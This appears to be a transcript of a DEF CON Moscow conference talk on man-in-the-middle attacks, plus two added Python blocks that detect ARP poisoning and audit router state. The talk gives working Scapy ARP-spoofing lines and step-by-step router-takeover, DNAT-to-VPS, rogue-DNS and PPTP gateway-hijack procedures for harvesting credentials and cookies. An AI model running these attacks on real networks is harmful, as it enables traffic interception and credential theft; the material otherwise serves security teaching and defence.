defcon moscow #0x0a - oleg kupreev "uncommon mitm in uncommon conditions"

Upload: defcon-moscow

Post on 08-Feb-2017

Page 1: Defcon Moscow #0x0A - Oleg Kupreev "Uncommon MiTM in uncommon conditions"
Page 2:

Uncommon MiTM in uncommon conditions

Page 3:

00 WHOAMI
• @090h, [email protected], keybase.io/090h
• ZN HW Village organizer [email protected]
• 802.11 pwner, SDR/RF enthusiast
• embedded reverser (for PWN/DIY)
• JBFC/DC7499 member
• researcher at hlsec.ru
• pwning telecommunications since 2002
• …was doing MITM 20 years ago 8)

Page 4:

01 INTRO
• XXI century is the communications century
• When I was a boy we counted in Pentiums 8) 1993 Pentium 66MHz – 2000 Pentium 4 1400MHz
• Nowadays we count in G and still use Pentium, but 4G is used and 5G is in progress
• DialUp 9600 FIDO – FTTH 100Mb Internet
• Nearest future: 5G + IPv6 + IoE
• Security of communications is evolving slooooooooooowly. SS7 invented in 1975, kicking ass nowadays

Page 5:

02 MAN MITM
• MITM = Man In The Middle
• It is a fundamental type of communication attack
• Subtypes: active, passive
• IRL: passive MITM = sniff, active MITM = MITM
• Also has a name….

Page 6:
Page 7:
Page 8:

Alice, Bob and Eve…

Page 9:

.. and sometimes Charlie

Page 10:

.. and Mallory aka Trudy

Page 11:

Implementation
• Fundamental => data channel independent
• Data channels:
  • Ethernet
  • USB
  • UART
  • SPI
  • RFID
  • NFC
  • WiFi
  • GSM

Page 12:

ETHERNET EVE

Page 13:

MY FIRST SNIFFER EVE

Page 14:

ALICE LOOKED AWESOME THESE DAYS

Page 15:

NFC EVE

Page 16:

Short summary
• Technology changes – MiTM changes. Hackers should be adaptive.
• Security of telecommunications is like in the 90’s
• The MiTM world is much bigger than most hackers think
• Study fundamental sciences, to be able to hack at the FUNdaMENTAL layer!

Page 17:

I LIKE TO MITM IT MITM IT

Page 18:

MITM I HAVE KNOWN AND LOVED
• LAN based MITM
• WAN based MITM
• Rogue AP MITM (KARMA/MANA/HostapdWPE)
• MITM over VPN (L2TP, PPTP)
• Hybrid MITM

Page 19:

MITM anatomy
• ARP/DHCP/IPv6/RogueAP/SOME_ATTACK to become MALLORY
• PLAiN_TEXT_PROTO => SNIFF FOR LOOT + INJECT EViL
• HTTP + BEEF hook.js => MITB = MAN_IN_THE_BROWSER
• HTTP + BDFProxy => SHELLZ
• SSL + PROTO => (SSLSPLIT || SSLSTRiP) => PROTO
• SSL + PROTO => (HEARTBLEED || POODLE) => PWN
• LOOT => cookies, credentials, photos, locations
• Custom sniffers/injectors/sploits for protocols/apps/vulns
• Example: SMB/NTLM relays

Page 20:

THAT’S WHY PRACTICE RULES!

Page 21:

Cooking MITM by ARP cache poison attack

Page 22:

Practice with Scapy

Page 23:

ARP attacks

from scapy.all import *
clientMAC, client, gateway = "00:11:22:33:44:55", "192.168.1.10", "192.168.1.1"  # placeholder lab values: victim MAC, victim IP, gateway IP
sendp( Ether(dst=clientMAC)/ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 )  # half duplex: only the client's ARP cache is poisoned; sendp() because the frame starts at the Ether layer
sendp( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) /ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 )  # ARP spoofing in VLANs: the same request, double 802.1Q-tagged
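The detection side of the ARP attack shown above, as an added example that is not part of the talk: a pure-Python parser for Ethernet/ARP frames (including the double 802.1Q tagging of the second Scapy line) and a check that reports any request or reply claiming a trusted IP from an unexpected MAC. The gateway, client and attacker addresses are constructed lab values.

```python
import struct
from ipaddress import IPv4Address

ETH_ARP, ETH_8021Q = 0x0806, 0x8100
mac_bytes = lambda m: bytes.fromhex(m.replace(":", ""))
mac_str = lambda b: ":".join(f"{x:02x}" for x in b)

def build_arp(dst_mac, src_mac, op, sha, spa, tpa, vlans=()):
    """Constructed test frame: Ethernet header, optional stacked 802.1Q tags, ARP body."""
    hdr = mac_bytes(dst_mac) + mac_bytes(src_mac)
    for vid in vlans:  # Scapy's Dot1Q()/Dot1Q() stacking uses TPID 0x8100 for both tags
        hdr += struct.pack("!HH", ETH_8021Q, vid)
    body = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + mac_bytes(sha)
    body += IPv4Address(spa).packed + b"\0" * 6 + IPv4Address(tpa).packed  # tha left zero
    return hdr + struct.pack("!H", ETH_ARP) + body

def parse_arp(frame):
    """Return (sha, spa, tpa, op, vlan_ids) for an Ethernet/IPv4 ARP frame, else None."""
    off, vlans = 14, []
    ethertype = struct.unpack("!H", frame[12:14])[0] if len(frame) >= 14 else None
    while ethertype == ETH_8021Q and len(frame) >= off + 4:  # walk over any VLAN tags
        tci, ethertype = struct.unpack("!HH", frame[off:off + 4])
        vlans.append(tci & 0x0FFF)
        off += 4
    if ethertype != ETH_ARP or len(frame) < off + 28:
        return None
    hw, proto, hlen, plen, op = struct.unpack("!HHBBH", frame[off:off + 8])
    if (hw, proto, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    a = frame[off + 8:off + 28]  # sha(6) spa(4) tha(6) tpa(4)
    return mac_str(a[:6]), str(IPv4Address(a[6:10])), str(IPv4Address(a[16:20])), op, vlans

def detect_poisoning(frames, trusted):
    """trusted = {ip: mac}. Flag any ARP request *or* reply whose sender IP is trusted but whose
    sender MAC differs: the slide uses who-has with psrc=gateway, and victims cache request senders too."""
    alerts = []
    for sha, spa, _tpa, op, vlans in filter(None, map(parse_arp, frames)):
        if spa in trusted and trusted[spa] != sha:
            alerts.append({"ip": spa, "expected": trusted[spa], "seen": sha,
                           "op": "request" if op == 1 else "reply", "vlans": vlans})
    return alerts

GW_IP, GW_MAC, CL_IP, CL_MAC = "192.168.1.1", "aa:bb:cc:00:00:01", "192.168.1.10", "aa:bb:cc:00:00:02"  # constructed
EVIL_MAC = "de:ad:be:ef:00:01"  # constructed attacker MAC

def sample_run():
    frames = [build_arp(CL_MAC, GW_MAC, 2, GW_MAC, GW_IP, CL_IP),                     # genuine reply
              build_arp(CL_MAC, EVIL_MAC, 1, EVIL_MAC, GW_IP, CL_IP),                 # poisoned who-has
              build_arp(CL_MAC, EVIL_MAC, 1, EVIL_MAC, GW_IP, CL_IP, vlans=(1, 2))]   # VLAN-hopping variant
    return detect_poisoning(frames, {GW_IP: GW_MAC})
```

A replies-only monitor misses this attack entirely, which is why the check inspects both opcodes.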

Page 24:

Meanwhile in real world

Page 25:

Common MITM after ARP poison

Page 26:

IRL: WTF IS GOING ON?

Page 27:

SOME ATTACK? MAYBE PWN THE ROUTER?

Page 28:

PixieWPS + admin:admin @ web interface

Page 29:

Shodan + device-pharmer.py pwnage

Page 30:

We’ve got root! What to do next?
• Backup configuration
• Get shell
• Research firmware availabilities
• Have fun

Page 31:

Backup configuration

Page 32:

Enable telnet access

Page 33:

Enable DynDNS if public ("white") IP

Page 34:

Enable syslog to rsyslogd @ VPS

Page 35:

Use Guest WiFi as tiny KARMA

Page 36:

Separate SSID, IP mask = comfort

Page 37:

Install plugins

Page 38:

Enable PPTP VPN

Page 39:

Install and use tcpdump in firmware

Page 40:

BPF 4 YOU

Page 41:

Set DNS to your EvilDNS with dnschef

Page 42:

Passive MITM aka EVE at router
• tcpdump
• NFS mount and/or netcat
• Write pcap file to share/pipe with tcpdump

Page 43:

Eve on router

Page 44:

Mallory on router
• Set DNS to VPS
• Install tcpdump, sslsplit, sslstrip
• NFS mount/netcat
• Write pcap file to share/pipe with tcpdump

Page 45:

Mallory on router

Page 46:

Pros and cons
Pros:
• Not so hard to do
Cons:
• Router is rebooted by watchdog or users
• MITM is sloooooooooow because of the high CPU temperature
• Not so many routers have such rich features
• VPS IP disclosure during MITM

Page 47:

WAN MITM TO VPS

Page 48:

WAN MITM ALGO
• Telnet to router
• Run mitmproxy in transparent mode on VPS
• DNAT port 80 to VPS_IP:8080

Page 49:

Router requirements
• telnet/ssh/rce/cmd inj
• iptables

Page 50:

WAN based MITM

Page 51:

Pros and cons
Pros:
• Not so hard to do
Cons:
• Only works for HTTP traffic
• Can’t distinguish clients by IP
• VPS IP disclosure during MITM

Page 52:

HARDCORE MODE ON
PPTP based MITM

Page 53:

PPTP MITM ideas
• MiTM consists of 2 parts: for router and for VPS
• All active attacks are running on the VPS
• Router is used for forwarding and routing
• pwner is pwning

Page 54:

Router requirements
• PPTP VPN server in firmware
• iptables
• telnet/ssh/rce/cmd inj

Page 55:

VPS requirements
• Linux
• pptp
• iptables
• sslstrip, sslsplit, tcpdump, mitmproxy

Page 56:

PPTP MITM ALGO
• Connect from VPS to PPTP VPN
• Get ppp0 interface IP
• Launch MITM kit on ppp0 (sslsplit, sslstrip, iptables forwarding)
• Telnet to router
• Add ISP gateway to route map
• Set VPS ppp0 IP as default gateway
• PWN’em all
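A router-side audit for the traces the WAN and PPTP procedures leave behind (the DNAT rule of the WAN MITM algo, the replaced default gateway of the PPTP algo, and the "set DNS to VPS" step), added here and not from the talk. It assumes state captured in the formats of iptables -t nat -S, ip route show and /etc/resolv.conf; eth0 as WAN, br0 as LAN, the ISP gateway/resolver and every address are constructed placeholders.

```python
import shlex
from ipaddress import ip_address, ip_network

# Constructed snapshot of a home router (sample values, not from the talk), in the
# formats of `iptables -t nat -S`, `ip route show` and /etc/resolv.conf.
NAT_RULES = [
    "-A PREROUTING -i br0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 203.0.113.5:8080",
    "-A PREROUTING -i eth0 -p tcp -m tcp --dport 22 -j DNAT --to-destination 192.168.1.20:22",
    "-A POSTROUTING -o eth0 -j MASQUERADE",
]
ROUTES = ["default via 10.8.0.1 dev ppp1", "100.64.0.1 dev eth0 scope link",
          "192.168.1.0/24 dev br0 proto kernel scope link src 192.168.1.1"]
RESOLV = ["nameserver 203.0.113.5", "nameserver 100.64.0.53"]
LAN, WAN_IF, WAN_GW = ip_network("192.168.1.0/24"), "eth0", ip_address("100.64.0.1")
ISP_DNS = {ip_address("100.64.0.53")}  # resolvers the ISP is expected to hand out

def audit_nat(rules):
    """Flag DNAT whose --to-destination leaves the LAN: the talk's WAN MITM step is
    'DNAT port 80 to VPS_IP:8080', and a VPS is never a LAN address."""
    hits = []
    for rule in rules:
        argv = shlex.split(rule)
        if "-j" in argv and argv[argv.index("-j") + 1] == "DNAT" and "--to-destination" in argv:
            host = argv[argv.index("--to-destination") + 1].rsplit(":", 1)[0]
            if ip_address(host) not in LAN:
                hits.append(f"DNAT to non-LAN host {host}: {rule}")
    return hits

def audit_routes(routes):
    """Flag a default route not pointing at the ISP gateway on the WAN port: the PPTP
    variant adds a host route to the ISP gateway and then makes the VPS's ppp address
    the default gateway. Assumes the default route is 'default [via X] dev Y ...' pairs."""
    hits = []
    for route in routes:
        t = route.split()
        if t and t[0] == "default":
            opts = dict(zip(t[1::2], t[2::2]))  # "via X dev Y" -> {"via": X, "dev": Y}
            if opts.get("dev") != WAN_IF or ("via" in opts and ip_address(opts["via"]) != WAN_GW):
                hits.append(f"default route hijacked: {route}")
    return hits

def audit_dns(resolv):
    """Flag resolvers outside the LAN and the ISP's set (the 'set DNS to VPS/dnschef' step)."""
    servers = [ip_address(l.split()[1]) for l in resolv if l.startswith("nameserver ")]
    return [f"unexpected resolver {ns}" for ns in servers if ns not in LAN and ns not in ISP_DNS]

def audit_all():
    return audit_nat(NAT_RULES) + audit_routes(ROUTES) + audit_dns(RESOLV)
```

The "VPS IP disclosure" listed under cons is exactly what the first and third checks key on: the foreign address has to appear in the router's own state.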

Page 57:

PPTP Server on router + Mallory on VPS

Page 58:

Pros and cons
Pros:
• FULL MITM
• No IP disclosure
Cons:
• Router loses connection to the Internet if the PPTP connection is down